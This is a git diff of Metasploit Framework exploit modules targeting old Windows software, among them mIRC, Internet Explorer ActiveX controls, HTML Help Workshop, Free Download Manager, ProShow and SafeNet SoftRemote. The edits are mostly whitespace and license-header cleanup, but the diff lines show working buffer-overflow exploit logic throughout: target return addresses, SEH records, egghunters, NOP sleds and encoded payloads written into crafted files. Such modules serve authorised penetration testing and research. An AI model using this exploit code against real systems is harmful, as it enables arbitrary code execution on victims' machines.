@@ class Metasploit3 < Msf::Exploit::Remote 'Windows XP SP0/SP1', { 'Platform' => 'win', - 'Rets' => + 'Rets' => [ 0x7605122f, # XP SP0/SP1 shell32.dll: jmp esp #0x773f346a # XP SP2 comctl32.dll: jmp esp @@ -85,9 +83,9 @@ class Metasploit3 < Msf::Exploit::Remote end # Build out our overflow buffer - buf = + buf = rand_text(2972, payload_badchars) + - [ ret ].pack('V') + + [ ret ].pack('V') + "\x60" + # pusha "\x6a" + rand_char + # push byte 0x1 "\x6a" + rand_char + # push byte 0x1 @@ -100,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote strname = rand_text_alpha(rand(100) + 1) # Build out the message - content = + content = "" + "" + " - | - + | + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/mirc_irc_url.rb b/modules/exploits/windows/browser/mirc_irc_url.rb index c6273daa0c..29b5cf49a9 100644 --- a/modules/exploits/windows/browser/mirc_irc_url.rb +++ b/modules/exploits/windows/browser/mirc_irc_url.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -23,15 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'mIRC IRC URL Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in mIRC 6.1. By + This module exploits a stack overflow in mIRC 6.1. By submitting an overly long and specially crafted URL to - the 'irc' protocol, an attacker can overwrite the buffer + the 'irc' protocol, an attacker can overwrite the buffer and control program execution. }, 'License' => MSF_LICENSE, - 'Author' => 'MC', + 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2003-1336'], [ 'OSVDB', '2665'], @@ -75,9 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload - handler(cli) + handler(cli) end end diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index 38fd167a31..7aed6bf1d0 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, - :javascript => false, + :javascript => false, :os_name => OperatingSystems::WINDOWS, :vuln_test => nil, # no way to test without just trying it :prefix_html => "Open Playlist + An attacker must send the file to victim and the victim must open the file. File-->Open Playlist }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancek ' ], @@ -37,11 +37,11 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 800, 'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d", - 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, + 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Tested ok patrickw 20090503 [ 'Destiny Universal', { 'Ret' => 0x00bf9d4d } ], #jmp esp Destiny.exe @@ -51,10 +51,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 03 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'exploit_destiny.m3u']), - ], self.class) + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'exploit_destiny.m3u']), + ], self.class) end @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote filepls << [target.ret].pack('V') filepls << make_nops(10) filepls << payload.encoded - print_status("Creating '#{datastore['FILENAME']}' file ...") + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(filepls) diff --git a/modules/exploits/windows/fileformat/djvu_imageurl.rb b/modules/exploits/windows/fileformat/djvu_imageurl.rb index 90844880cb..47093de14a 100644 --- a/modules/exploits/windows/fileformat/djvu_imageurl.rb +++ b/modules/exploits/windows/fileformat/djvu_imageurl.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' @@ -16,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in DjVu ActiveX Component. When sending an + This module exploits a stack overflow in DjVu ActiveX Component. When sending an overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0) - an attacker may be able to execute arbitrary code. This control is not marked safe + an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly. }, 'License' => MSF_LICENSE, - 'Author' => [ 'dean ' ], + 'Author' => [ 'dean ' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-4922' ], [ 'OSVDB', '49592' ], @@ -42,24 +46,24 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ] + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ] ], 'DisclosureDate' => 'Oct 30 2008', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), - ], self.class) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), + ], self.class) end - def exploit + def exploit # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Create some nops. + + # Create some nops. nops = Rex::Text.to_unescape(make_nops(4)) - + # Set the return. ret = Rex::Text.uri_encode([target.ret].pack('L')) @@ -76,25 +80,25 @@ class Metasploit3 < Msf::Exploit::Remote rand8 = rand_text_alpha(rand(100) + 1) content = %Q| - - - - - | + + + + +| content = Rex::Text.randomize_space(content) diff --git a/modules/exploits/windows/fileformat/etrust_pestscan.rb b/modules/exploits/windows/fileformat/etrust_pestscan.rb index 25380d5065..3c7177ff77 100644 --- a/modules/exploits/windows/fileformat/etrust_pestscan.rb +++ b/modules/exploits/windows/fileformat/etrust_pestscan.rb @@ -49,10 +49,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jun 5 2007', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']), - ], self.class) + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']), + ], self.class) end def exploit @@ -77,26 +77,25 @@ class Metasploit3 < Msf::Exploit::Remote rand7 = rand_text_alpha(rand(100) + 1) rand8 = rand_text_alpha(rand(100) + 1) - content = %Q| - - - - - | + content = %Q| + + + +| content = Rex::Text.randomize_space(content) diff --git a/modules/exploits/windows/fileformat/fdm_torrent.rb b/modules/exploits/windows/fileformat/fdm_torrent.rb index 30aac34e27..853c1939a0 100644 --- a/modules/exploits/windows/fileformat/fdm_torrent.rb +++ b/modules/exploits/windows/fileformat/fdm_torrent.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,14 +16,14 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh - + def initialize(info = {}) super(update_info(info, 'Name' => 'Free Download Manager Torrent Parsing Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Free Download Manager - 3.0 Build 844. Arbitrary code execution could occur when parsing a - specially crafted torrent file. + 3.0 Build 844. Arbitrary code execution could occur when parsing a + specially crafted torrent file. }, 'License' => MSF_LICENSE, 'Author' => @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - }, + }, 'Payload' => { 'Space' => 1024, @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Free Download Manager 3.0 (Build 844)', { @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote bof = rand_text_alphanumeric(10004) + generate_seh_payload(target.ret) # hit the end of the stack... bof << rand_text(1000) * 50 - + len = rand(10*1024*1024) info_hash = { 'length' => len, @@ -85,19 +85,19 @@ class Metasploit3 < Msf::Exploit::Remote 'piece length' => len + rand(262144 - len), 'pieces' => rand_text(20), } - + ann_hash = { 'info' => info_hash, } - + encoded = bencode_hash(ann_hash) - + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(encoded) - + end - + # bencoding functions: # # http://wiki.theory.org/BitTorrentSpecification @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote throw("unsupported bencode data type! " + item.testzt) end end - + def bencode_list(list) ret = "l" list.each do |el| @@ -144,5 +144,5 @@ class Metasploit3 < Msf::Exploit::Remote ret << "e" return ret end - + end diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index 70c400edf9..fc0eaf62cf 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -9,10 +13,10 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - + include Msf::Exploit::FILEFORMAT include Msf::Exploit::Egghunter - + def initialize(info = {}) super(update_info(info, 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit', @@ -34,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 1024, @@ -42,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -4800, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0 ], @@ -50,24 +54,23 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 06 2006', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']), + ], self.class) end def exploit - + # use the egghunter! eh_stub, eh_egg = generate_egghunter - + off = target['Offset'] idxf = "" idxf << make_nops(off - eh_stub.length) idxf << eh_stub idxf << [target.ret].pack('V') - + sploit = "[OPTIONS]\r\n" sploit << "Contents file=" sploit << idxf @@ -77,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "\r\n" sploit << eh_egg * 2 sploit << payload.encoded - + hhp = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index b483ac84d5..2228666b40 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -9,10 +13,10 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - + include Msf::Exploit::FILEFORMAT include Msf::Exploit::Egghunter - + def initialize(info = {}) super(update_info(info, 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit', @@ -35,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 1024, @@ -43,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -4800, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0 ], @@ -51,24 +55,23 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 17 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']), + ], self.class) end def exploit - + # use the egghunter! eh_stub, eh_egg = generate_egghunter - + off = target['Offset'] idxf = "" idxf << make_nops(off - eh_stub.length) idxf << eh_stub idxf << [target.ret].pack('V') - + sploit = "[OPTIONS]\r\n" sploit << "Index file=" sploit << idxf @@ -78,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "\r\n" sploit << eh_egg * 2 sploit << payload.encoded - + hhp = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb index 8b93eab22e..622083f8dc 100644 --- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb +++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,15 +16,15 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh - + def initialize(info = {}) super(update_info(info, 'Name' => 'HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in HT-MP3Player 1.0. - Arbitrary code execution could occur when parsing a specially crafted + Arbitrary code execution could occur when parsing a specially crafted .HT3 file. - + NOTE: The player installation does not register the file type to be handled. Therefore, a user must take extra steps to load this file. }, @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 4108, @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -8500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'HT-MP3Player 1.0', { @@ -76,26 +76,26 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - + # payload first bof = payload.encoded - + # filler bof << rand_text_alphanumeric(payload_space - bof.length) - + # NOTE: the nul smashes a nul, oh no! sehrec = generate_seh_record(target.ret) # jmp -4108 (depends on target addr ending with 0xff) - sehrec[0,4] = "\xe9\xef\xef\xff" + sehrec[0,4] = "\xe9\xef\xef\xff" bof << sehrec - + # crash reading from offset 4096 (put bad addr here) bof[4096,4] = [0xf0f0f0f0].pack('V') - + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(bof) - + end - + end diff --git a/modules/exploits/windows/fileformat/ideal_administration_2009_ipj.rb b/modules/exploits/windows/fileformat/ideal_administration_2009_ipj.rb index 266c02b754..cff54ff69d 100644 --- a/modules/exploits/windows/fileformat/ideal_administration_2009_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_administration_2009_ipj.rb @@ -15,14 +15,14 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'IDEAL Administration 2009 Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in IDEAL Administration v9.7. - By creating a specially crafted ipj file, an an attacker may be able - to execute arbitrary code. + By creating a specially crafted ipj file, an an attacker may be able + to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Dr_IDE', 'dookie', ], @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - }, + }, 'Payload' => { 'Space' => 1000, @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows XP Universal', { 'Ret' => 0x10010F2E } ], # CALL EBP in ListWmi.dll ], @@ -52,11 +52,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 05 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.ipj']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.ipj']), + ], self.class) end def exploit @@ -69,12 +68,12 @@ class Metasploit3 < Msf::Exploit::Remote sploit << make_nops(300) sploit << payload.encoded sploit << "\x0D\x0A\x5B\x45\x6E\x64\x5D\x0D\x0A" - + ipj = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(ipj) + file_create(ipj) end diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index e4a1a878c9..69f784caed 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb @@ -77,30 +77,29 @@ class Metasploit3 < Msf::Exploit::Remote rand7 = rand_text_alpha(rand(100) + 1) rand8 = rand_text_alpha(rand(100) + 1) - content = %Q| - - - - - - | + content = %Q| + + + + +| content = Rex::Text.randomize_space(content) @@ -110,6 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote end end + =begin Other vulnerable method's: @@ -119,26 +119,26 @@ void CreateSnapFromDefaultProfile(BSTR szDescription); [id(0x00000013), helpstring("method CreateReportOfSysInfoDifferences")] void CreateReportOfSysInfoDifferences( - BSTR szOldSnapFile, - BSTR szNewSnapFile, - BSTR szOutFile, - short format, - short append); + BSTR szOldSnapFile, + BSTR szNewSnapFile, + BSTR szOutFile, + short format, + short append); [id(0x0000000f), helpstring("method CreateReportOfSnapshotDifferences")] void CreateReportOfSnapshotDifferences( - BSTR szOldSnapFile, - BSTR szNewSnapFile, - BSTR szOutFile, - short format); + BSTR szOldSnapFile, + BSTR szNewSnapFile, + BSTR szOutFile, + short format); [id(0x00000012), helpstring("method CreateReportOfAssetDifferences")] void CreateReportOfAssetDifferences( - BSTR szOldSnapFile, - BSTR szNewSnapFile, - BSTR szOutFile, - short format, - BSTR pszAsset, - short append); + BSTR szOldSnapFile, + BSTR szNewSnapFile, + BSTR szOutFile, + short format, + BSTR pszAsset, + short append); =end diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index aa45ad6a03..9e8afe95b0 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Creating Excel spreadsheet ...") - out = File.expand_path(File.join(datastore['OUTPUTPATH'], datastore['FILENAME'])) + out = File.expand_path(File.join(datastore['OUTPUTPATH'], datastore['FILENAME'])) stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE) if (not stg) raise RuntimeError, 'Unable to create output file' diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index 3bbff6dbd7..38b616ab46 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -11,15 +15,15 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Visual Basic VBP Buffer Overflow', 'Description' => %q{ - This module exploits a stack oveflow in Microsoft Visual - Basic 6.0. When a specially crafted vbp file containing a long - reference line, an attacker may be able to execute arbitrary - code. + This module exploits a stack oveflow in Microsoft Visual + Basic 6.0. When a specially crafted vbp file containing a long + reference line, an attacker may be able to execute arbitrary + code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], @@ -32,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 650, @@ -41,19 +45,18 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'Windows XP SP2 English', { 'Ret' => 0x0fabd271, 'Scratch' => 0x7ffddfb4 } ], + [ 'Windows XP SP2 English', { 'Ret' => 0x0fabd271, 'Scratch' => 0x7ffddfb4 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Sep 4 2007', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.vbp']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.vbp']), + ], self.class) end def exploit @@ -98,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(vbp) - + end end diff --git a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb index 9c48dfe8e4..17b74f1102 100644 --- a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb +++ b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' @@ -16,12 +20,12 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit', 'Description' => %q{ - The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker - to execute arbitrary code on a system. By passing a negative integer to the + The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker + to execute arbitrary code on a system. By passing a negative integer to the WksPictureInterface method, an attacker could execute arbitrary code on the system with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6. This control is not marked safe for scripting, please choose your attack vector carefully. - }, + }, 'License' => MSF_LICENSE, 'Author' => [ 'dean ' ], 'Version' => '$Revision$', @@ -42,15 +46,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP2-SP3 IE 7.0', { 'Ret' => 0x0A0A0A0A } ] + [ 'Windows XP SP2-SP3 IE 7.0', { 'Ret' => 0x0A0A0A0A } ] ], 'DisclosureDate' => 'Nov 28 2008', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), - ], self.class) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), + ], self.class) end def exploit @@ -71,27 +75,27 @@ class Metasploit3 < Msf::Exploit::Remote rand5 = rand_text_alpha(rand(100) + 1) rand6 = rand_text_alpha(rand(100) + 1) rand7 = rand_text_alpha(rand(100) + 1) - + content = %Q| - - - - - - - | + + + + + + +| print_status("Creating HTML file ...") diff --git a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb index d41b989bf8..01171df824 100644 --- a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 1000, @@ -45,19 +45,19 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - # 0x01a614ea # p/p/r @ all.dnt + # 0x01a614ea # p/p/r @ all.dnt [ 'Windows Universal', { 'Offset' => 4036, 'Ret' => 0x101a4cf9 } ], # p/p/r if.dnt ], 'Privileged' => false, 'DisclosureDate' => 'Aug 20 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.psh']), - ], self.class) + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.psh']), + ], self.class) end def exploit @@ -65,18 +65,18 @@ class Metasploit3 < Msf::Exploit::Remote sploit = make_nops(target['Offset'] - 4 - payload.encoded.length) sploit << payload.encoded sploit << generate_seh_record(target.ret) - + # note, just in case the arguments get modified, we'll jump back into our buffer... sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + target['Offset'].to_s).encode_string # cause exception hitting the end of the stack sploit << rand_text(1000) * 13 - + content = "Photodex(R) ProShow(TM) Show File Version=0\r\n" content << "cells=1\r\n" content << "cell[0].nrOfImages=1\r\n" content << "cell[0].images[0].image=" << sploit << "\r\n" - + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(content) diff --git a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb index 6cc7556c02..18f33bb66b 100644 --- a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb +++ b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -11,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'SafeNet SoftRemote GROUPNAME Buffer Overflow', @@ -34,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 750, @@ -45,28 +49,27 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'Windows XP SP3 English', { 'Ret' => 0x7e47bcaf } ], + [ 'Windows XP SP3 English', { 'Ret' => 0x7e47bcaf } ], [ 'WinSrv 2000 SP4 English', { 'Ret' => 0x78344dd3 } ], - [ 'WinSrv 2000 SP2 English', { 'Ret' => 0x7843c1a1 } ], - [ 'WinSrv 2003 Enterprise Edition SP1 (v1023) English', { 'Ret' => 0x7741246b } ], + [ 'WinSrv 2000 SP2 English', { 'Ret' => 0x7843c1a1 } ], + [ 'WinSrv 2003 Enterprise Edition SP1 (v1023) English', { 'Ret' => 0x7741246b } ], ], 'Privileged' => false, 'DisclosureDate' => 'Oct 30 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.spd']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.spd']), + ], self.class) end def exploit # Need to cause the access violation!! sploit = rand_text_alpha_upper(20024) - + sploit[92,4] = [target.ret].pack('V') # Play it safe. sploit[96,100] = "\x90" * 100 @@ -215,10 +218,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(spd) - + end end + =begin First chance exceptions are reported before any exception handling. This exception may be expected and handled. diff --git 